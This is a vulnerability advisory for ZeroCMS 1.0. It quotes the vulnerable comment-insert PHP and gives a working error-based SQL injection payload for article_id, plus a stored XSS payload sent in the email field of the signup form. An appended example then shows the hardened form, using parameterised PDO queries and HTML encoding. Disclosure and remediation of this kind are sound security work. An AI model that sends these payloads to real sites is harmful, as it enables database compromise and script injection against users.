
ZeroCMS 1.0 XSS & SQL INJECTION

Author: jsass , Published: 11-06-2014
####################################################################
Exploit: ZeroCMS 1.0 XSS & SQL INJECTION
Author: jsass
Date : 11\06\2014
Contact Twitter: @Kwsecurity
Project Site: http://www.aas9.in/zerocms/
version: 2.5
Tested on: Kali


//** Q8 GRAYHAT TEAM **\\

http://www.exploit-db.com/exploits/33702/

####################################################################

1- SQL INJECTION
File : zero_transact_article.php

case 'Submit Comment':
    $article_id = (isset($_POST['article_id'])) ? $_POST['article_id'] : '';
    $comment_text = (isset($_POST['comment_text'])) ? $_POST['comment_text'] : '';
    if (isset($_SESSION['user_id']) && !empty($article_id) && !empty($comment_text)) {
        // $article_id is concatenated into the query unquoted and unescaped;
        // only $comment_text passes through mysql_real_escape_string().
        $sql = 'INSERT INTO zero_comments
                (article_id, user_id, comment_date, comment_text)
            VALUES
                (' . $article_id . ',
                ' . $_SESSION['user_id'] . ',
                "' . date('Y-m-d H:i:s') . '",
                "' . mysql_real_escape_string($comment_text, $dbx) . '")';
        mysql_query($sql, $dbx) or die(mysql_error($dbx));
    }
    redirect('zero_view_article.php?article_id=' . $article_id);
    break;

EXPLOIT :

POST

http://localhost/zerocms-master/zero_transact_article.php?action=Submit Comment

article_id=1 AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT(0x0a,VERSION(),0x0a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

EX.

2- POST ( XSS );

http://localhost/zerocms-master/zero_transact_user.php
name=jsass&email=admin"></style></script><script>alert(1);</script>&password_1=admin&password_2=admin&action=Create+Account
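
A hardened form of the comment insert from item 1, plus output encoding for the email value from item 2, as an added example that is not ZeroCMS code and not part of the original advisory. It assumes PDO in place of the mysql_* functions, an in-memory SQLite database, and hypothetical helper names (parse_article_id, add_comment, html); the page does not show where ZeroCMS renders the email field, so the encoding step is an assumption about the fix.

```php
<?php
// Added example, not ZeroCMS code. Table and column names follow the advisory;
// the in-memory SQLite database and the sample inputs are constructed.

// Accept article_id only if it is a positive integer; return null otherwise.
function parse_article_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Insert a comment with every value bound as a parameter, never concatenated.
function add_comment(PDO $db, $rawArticleId, int $userId, string $text): bool
{
    $articleId = parse_article_id($rawArticleId);
    if ($articleId === null || $text === '') {
        return false; // reject before the value can reach SQL or redirect()
    }
    $stmt = $db->prepare(
        'INSERT INTO zero_comments (article_id, user_id, comment_date, comment_text)
         VALUES (:article_id, :user_id, :comment_date, :comment_text)'
    );
    return $stmt->execute([
        ':article_id'   => $articleId,
        ':user_id'      => $userId,
        ':comment_date' => date('Y-m-d H:i:s'),
        ':comment_text' => $text,
    ]);
}

// Encode a stored value for an HTML text or quoted-attribute context.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE zero_comments (article_id INTEGER, user_id INTEGER,
           comment_date TEXT, comment_text TEXT)');

// Constructed inputs: a valid id, a non-integer id, and the email value from item 2.
var_dump(add_comment($db, '1', 7, 'nice post'));
var_dump(add_comment($db, '1 AND (SELECT 1)', 7, 'nice post'));
echo html('admin"></style></script><script>alert(1);</script>'), "\n";
```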









####################################################################


Greets to: ALL MEMBERS IN SEC4EVER.COM & EXPLOIT4ARAB.COM & IS-SEC.COM
